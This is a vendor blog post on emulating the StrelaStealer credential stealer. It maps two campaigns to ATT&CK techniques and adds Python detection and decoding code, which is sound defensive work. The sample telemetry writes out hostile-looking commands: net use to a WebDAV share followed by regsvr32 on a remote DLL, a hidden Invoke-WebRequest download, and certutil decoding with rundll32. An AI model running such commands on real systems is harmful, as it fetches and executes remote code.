StrelaStealer, also known as Strela, is an information-stealing malware that first appeared in 2022. It is specifically designed to exfiltrate email account credentials from popular email clients such as Microsoft Outlook and Mozilla Thunderbird. StrelaStealer is primarily distributed via large-scale phishing campaigns delivering ZIP archives. These archives typically contain malicious JavaScript (JS) files that act as the initial infection vector. Upon execution, these scripts retrieve a malicious DLL payload from a WebDAV server and execute it directly in memory. The campaigns have affected over 100 organizations across Europe and the U.S., with a particular focus on victims located in Italy, Spain, Germany, and Ukraine.

In recent analysis, StrelaStealer has been associated with the threat actor group HIVE-0145, a cluster identified for its focus on credential theft and espionage-driven campaigns. As reported by IBM, HIVE-0145 is likely a financially motivated initial access broker (IAB), active since late 2022 and potentially the sole operator of StrelaStealer.

AttackIQ has released three new attack graphs composed of several Tactics, Techniques and Procedures (TTPs) exhibited by StrelaStealer during its most recent activities to help customers validate their security controls and their ability to defend against this threat. One of these attack graphs is a malware emulation attack graph which emulates the sequence of behaviors associated with the deployment of StrelaStealer on a compromised system.

Validating your security program performance against these behaviors is vital in reducing risk. By using these new attack graphs in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against baseline behaviors associated with StrelaStealer.
  • Assess their security posture against an information stealer family targeting victims worldwide.
  • Continuously validate detection and prevention pipelines against an emerging threat and its behaviors.

StrelaStealer – 2024-01 – Large-Scale Email Campaign Leads to StrelaStealer Deployment

In March 2024, Unit 42 reported a large-scale StrelaStealer campaign targeting over 100 organizations across the EU and U.S. The malware, designed to steal email login credentials from clients like Microsoft Outlook and Mozilla Thunderbird, was distributed via spam emails containing ZIP archives with JavaScript files. These scripts ultimately launched the StrelaStealer DLL payload. To evade detection, attackers varied the initial email attachment formats and updated the DLL payload with stronger obfuscation and anti-analysis techniques than those seen in previous campaigns.

Initial Access – Malware Deployment

This stage begins with the deployment of a ZIP archive containing a JavaScript file. The script uses CertUtil to decode a base64-encoded blob into the final StrelaStealer payload, a Dynamic Link Library (DLL) file, which is then executed via RunDLL32.

Ingress Tool Transfer (T1105): Two scenarios download a known malicious sample, one to memory and one to disk, to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Deobfuscate/Decode Files or Information (T1140): This scenario utilizes the legitimate certutil binary to decode a base64 encoded payload.

System Binary Proxy Execution: Rundll32 (T1218.011): This scenario executes an exported function from a specific DLL using the rundll32.exe Windows utility.

Discovery & Exfiltration – System Reconnaissance and Exfiltrate Files

This stage focuses on discovery and exfiltration activities. It gathers information about the system, installed applications, country locale, internet connectivity, and performs file system enumeration. Finally, the collected data is exfiltrated over HTTP.

System Information Discovery (T1082): This scenario executes the systeminfo command to collect information about the compromised system.

System Information Discovery (T1082): This scenario calls the GetComputerNameA Windows API to gather the NetBIOS name.

Software Discovery (T1518): This scenario executes a PowerShell script using the Get-ChildItem cmdlet to determine the different applications installed on the system.

System Location Discovery (T1614): This scenario executes the GetLocaleInfoA Windows API to retrieve the user default country locale code from the local computer.

System Information Discovery (T1082): This scenario executes the InternetCheckConnectionA Windows API call to verify internet access.

File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows native API calls to enumerate the file system.

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003): This scenario generates fake sensitive data which is exfiltrated over unencrypted HTTP POST requests to an AttackIQ controlled server.

StrelaStealer – 2024-11 – JavaScript File Leads to StrelaStealer Deployment

In November 2024, Logpoint reported a new StrelaStealer campaign featuring updated delivery and obfuscation techniques. While the initial payload remains a JavaScript (JS) file delivered via a ZIP archive through malspam, the attackers introduced the use of WScript to spawn a PowerShell process that executes an encoded command. This command uses net use to map a WebDAV network path, followed by the use of Regsvr32 to remotely register and execute a DLL payload hosted on that share.

Initial Access – Malware Deployment

This stage begins with the execution of the initial JavaScript payload via CScript, which launches an encoded PowerShell command that leverages net use to map a network path to a WebDAV share. Finally, Regsvr32 is used to remotely register and execute a Dynamic Link Library (DLL) file hosted on that share.

Ingress Tool Transfer (T1105): Two scenarios download a known malicious sample, one to memory and one to disk, to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Command and Scripting Interpreter: JavaScript (T1059.007): This scenario attempts to execute a JavaScript file via cscript.exe.

Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell’s -encodedCommand parameter.

System Network Connections Discovery (T1049): This scenario executes the net use Windows command to list the system's current network connections and mapped shares.

System Binary Proxy Execution: Regsvr32 (T1218.010): RegSvr32 is a native Windows utility that threat actors can use to register Component Object Model (COM) DLLs. Because it loads the DLL and calls its DllRegisterServer export, an actor can deploy a malicious DLL and have a signed, native Windows binary execute its code. This scenario executes RegSvr32 with an AttackIQ binary.
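The encoded PowerShell stage described above is opaque in process logs until the -EncodedCommand argument is decoded, and the decoding has a detail that trips up ad-hoc scripts: powershell.exe expects base64 of UTF-16LE bytes, not UTF-8. The following Python is an added example (not code from AttackIQ or the StrelaStealer samples) that decodes such a command line and flags the two indicators of the 2024-11 chain, a WebDAV share mapped with net use and a DLL registered from a UNC path with regsvr32. The command lines, the host 203.0.113.10 and the share and file names are constructed for the example.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...);
# -ec is common in the wild as well, so it is listed explicitly.
_ENC_FLAGS = "|".join(["ec"] + ["encodedcommand"[:i] for i in range(1, 15)])
ENCODED_ARG_RE = re.compile(rf"-(?:{_ENC_FLAGS})\s+([A-Za-z0-9+/=]{{16,}})", re.IGNORECASE)

# Indicators of the 2024-11 chain: "net use" against a UNC path (WebDAV uses the
# \\host@port\share form) and regsvr32 given a DLL on a UNC path.
NET_USE_UNC_RE = re.compile(r"\bnet(?:\.exe)?\s+use\b[^\n]*?\\\\\S+", re.IGNORECASE)
REGSVR32_UNC_RE = re.compile(r"\bregsvr32(?:\.exe)?\b[^\n]*?\\\\\S+", re.IGNORECASE)

# Constructed stage-two script standing in for the real one; not a StrelaStealer sample.
SAMPLE_SCRIPT = (
    r"net use \\203.0.113.10@8080\DavWWWRoot /user:guest guest; "
    r"regsvr32.exe /s \\203.0.113.10@8080\DavWWWRoot\update.dll"
)


def encode_powershell_command(script: str) -> str:
    """Encode a script exactly as -EncodedCommand expects: UTF-16LE bytes, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(blob: str) -> str:
    """Reverse of encode_powershell_command; raises on non-base64 or non-UTF-16 input."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def extract_encoded_scripts(command_line: str) -> list[str]:
    """Return every decodable -EncodedCommand payload found in a process command line."""
    scripts = []
    for match in ENCODED_ARG_RE.finditer(command_line):
        try:
            scripts.append(decode_powershell_command(match.group(1)))
        except (ValueError, UnicodeDecodeError):
            continue  # an argument that merely looks like base64
    return scripts


def triage_powershell_event(command_line: str) -> dict:
    """Decode the encoded command (if any) and flag the WebDAV/regsvr32 indicators."""
    decoded = "\n".join(extract_encoded_scripts(command_line))
    return {
        "encoded_command": bool(decoded),
        "decoded": decoded,
        "net_use_unc": bool(NET_USE_UNC_RE.search(decoded)),
        "regsvr32_unc": bool(REGSVR32_UNC_RE.search(decoded)),
    }


def demo() -> list[dict]:
    """Two constructed process command lines: a StrelaStealer-style launcher and a benign script run."""
    events = [
        "powershell.exe -nop -w hidden -ec " + encode_powershell_command(SAMPLE_SCRIPT),
        r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
    ]
    return [triage_powershell_event(cl) for cl in events]


if __name__ == "__main__":
    for result in demo():
        print(result)
```

Run the file as-is to see the decoded script and indicator flags for both events. In a pipeline, feed it the CommandLine field of process-creation events whose image is powershell.exe; the decoded text is also what the System Network Connections Discovery and Regsvr32 scenarios above would surface in command-line telemetry of the child processes.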

Discovery & Exfiltration – System Reconnaissance and Exfiltrate Files

This stage focuses on discovery and exfiltration activities. It gathers information about the system, installed applications, country locale, internet connectivity, and performs file system enumeration. Finally, the collected data is exfiltrated over HTTP.

System Information Discovery (T1082): This scenario executes the systeminfo command to collect information about the compromised system.

System Information Discovery (T1082): This scenario calls the GetComputerNameA Windows API to gather the NetBIOS name.

Software Discovery (T1518): This scenario executes a PowerShell script using the Get-ChildItem cmdlet to determine the different applications installed on the system.

System Location Discovery (T1614): This scenario executes the GetLocaleInfoA Windows API to retrieve the user default country locale code from the local computer.

System Information Discovery (T1082): This scenario executes the InternetCheckConnectionA Windows API call to verify internet access.

File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows native API calls to enumerate the file system.

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003): This scenario generates fake sensitive data which is exfiltrated over unencrypted HTTP POST requests to an AttackIQ controlled server.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads. The download-method terms are combined with OR: a single command line normally uses either Invoke-WebRequest or a WebClient DownloadData call, not both, so requiring both would miss most real downloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest” OR “DownloadData”) AND “Hidden”)

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

2. System Binary Proxy Execution: Rundll32 (T1218.011) and Regsvr32 (T1218.010):

Adversaries may use DLL files for many of their malware payloads and use native Windows utilities to execute them. The primary native methods for executing these files are the RunDll32 and RegSvr32 utilities: rundll32 is passed the DLL path and the name of the export to call, while regsvr32 loads the DLL and invokes its DllRegisterServer export (or DllInstall when /i is used).

2a. Detection

While these two native tools are commonly used by legitimate applications, there are behaviors related to their execution that stand out in process logs. DLLs executed from temporary or per-user profile directories, files that lack the standard .dll extension, or calls to unusual export names can all stand out from regular user behavior. The matching below is case-insensitive.

Process Name == (rundll32.exe OR regsvr32.exe)
Command Line CONTAINS (“TEMP” OR “.png” OR “Roaming” OR “%APPDATA%”)
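The two queries in sections 1a and 2a are written in a SIEM-neutral pseudo-syntax; the following Python is an added example (not AttackIQ code) that implements them as functions over process-creation records so they can be checked against sample telemetry before being ported to a query language. It goes beyond the page's two queries in three labeled places: pwsh.exe and DownloadString are added to the T1105 rule, a UNC-path term is added to the T1218 rule because the 2024-11 chain loads the DLL straight from a WebDAV share, and a third rule covers the certutil decode step (T1140) from the 2024-01 chain. The events, paths and host 203.0.113.10 are constructed, and the rule names are this example's own.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (e.g. Sysmon Event ID 1 or EDR telemetry)."""
    image: str
    command_line: str


# Terms from the page's query (iwr, invoke-webrequest, downloaddata) plus downloadstring, added here.
DOWNLOAD_TERM_RE = re.compile(r"\b(?:iwr|invoke-webrequest|downloaddata|downloadstring)\b", re.IGNORECASE)
# Terms from the page's T1218 query.
SUSPICIOUS_DLL_PATH_RE = re.compile(r"temp|\.png|roaming|%appdata%", re.IGNORECASE)
# \\host\share or WebDAV's \\host@port\share; an addition motivated by the 2024-11 chain.
UNC_PATH_RE = re.compile(r"\\\\[^\s\\]+\\")


def _image_name(path: str) -> str:
    """Lower-cased file name of an image path, accepting either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_t1105_native_download(ev: ProcessEvent) -> bool:
    """Section 1a: a shell downloading with a hidden window. pwsh.exe is added to the page's list."""
    if _image_name(ev.image) not in ("cmd.exe", "powershell.exe", "pwsh.exe"):
        return False
    return bool(DOWNLOAD_TERM_RE.search(ev.command_line)) and "hidden" in ev.command_line.lower()


def rule_t1218_proxy_execution(ev: ProcessEvent) -> bool:
    """Section 2a: rundll32/regsvr32 loading from temp/profile paths, a non-.dll name, or a UNC path."""
    if _image_name(ev.image) not in ("rundll32.exe", "regsvr32.exe"):
        return False
    return bool(SUSPICIOUS_DLL_PATH_RE.search(ev.command_line) or UNC_PATH_RE.search(ev.command_line))


def rule_t1140_certutil_decode(ev: ProcessEvent) -> bool:
    """Addition beyond the page's queries: certutil decoding a payload (T1140, 2024-01 chain)."""
    return _image_name(ev.image) == "certutil.exe" and bool(
        re.search(r"-decode(?:hex)?\b", ev.command_line, re.IGNORECASE)
    )


RULES = {
    "T1105": rule_t1105_native_download,
    "T1140": rule_t1140_certutil_decode,
    "T1218": rule_t1218_proxy_execution,
}


def evaluate(events: list[ProcessEvent]) -> list[list[str]]:
    """Return, per event, the sorted list of rule names that matched it."""
    return [sorted(name for name, rule in RULES.items() if rule(ev)) for ev in events]


# Constructed sample telemetry: the first four mirror the chains described on this page,
# the last two are benign uses of the same binaries.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -w hidden -c "IWR http://203.0.113.10/a.js -OutFile $env:TEMP\a.js"'),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil -decode C:\Users\u\AppData\Local\Temp\a.txt C:\Users\u\AppData\Local\Temp\a.png"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Users\u\AppData\Local\Temp\a.png,Entry"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s \\203.0.113.10@8080\DavWWWRoot\update.dll"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe shell32.dll,Control_RunDLL"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\scripts\inventory.ps1"),
]


if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print(f"{hits or '-'}\t{ev.command_line}")
```

Expect noise from the T1218 rule in environments where installers run from %TEMP% or Roaming; the usual tuning is to exclude signed parent installers or known paths rather than to drop the path terms, since the WebDAV and .png cases are the ones that matter for this family.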

2b. Mitigation

Wrap Up

In summary, these attack graphs will evaluate security and incident response processes and support the improvement of your security control posture against StrelaStealer. With data generated from continuous testing and the use of these attack graphs, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.